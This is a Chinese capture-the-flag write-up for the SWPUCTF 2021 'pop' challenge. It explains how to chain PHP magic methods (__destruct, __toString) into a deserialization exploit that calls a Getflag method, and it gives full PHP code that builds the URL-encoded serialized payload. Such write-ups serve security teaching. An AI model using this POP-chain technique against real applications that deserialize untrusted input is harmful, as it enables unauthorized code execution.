[SWPUCTF 2021 新生赛]pop

很明显了 反序列化 pop
构造pop链，主要还是 死盯 反序列化的魔法函数
从__destruct()入手，这里echo

可以调用到__toString

__toString 调用 function Getflag()

w44m类中两个变量并不是共有属性（关于属性文末有链接）
private：是PHP中类的私有成员
protected：是PHP中类的保护成员
所以我们就直接在类中进行赋值

如何调用w44m类中Getflag方法？
在w33m类中tostring方法，可以调用某一个类中的某一个方法。
因此可以给w33m类中的两个变量w00m=w44m类名，w22m=Getflag方法
如何调用w33m类呢？
destruct在对象被销毁时调用，所以给w22m类中的变量w00m一个类w33m就可以调用

pop链(在学校机房写的没有环境，找的php在线编译)

有私有属性的一定要url编码一下，会有不可见字符

完整pop链

<?php 
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}


$p = new w22m();
$p->w00m = new w33m();
$p->w00m->w00m=new w44m();
$p->w00m->w22m='Getflag';
echo urlencode(serialize($p));
?>

不了解属性的可以看看PHP类中public、protected、private的区别 PHP类中public、protected、private实例代码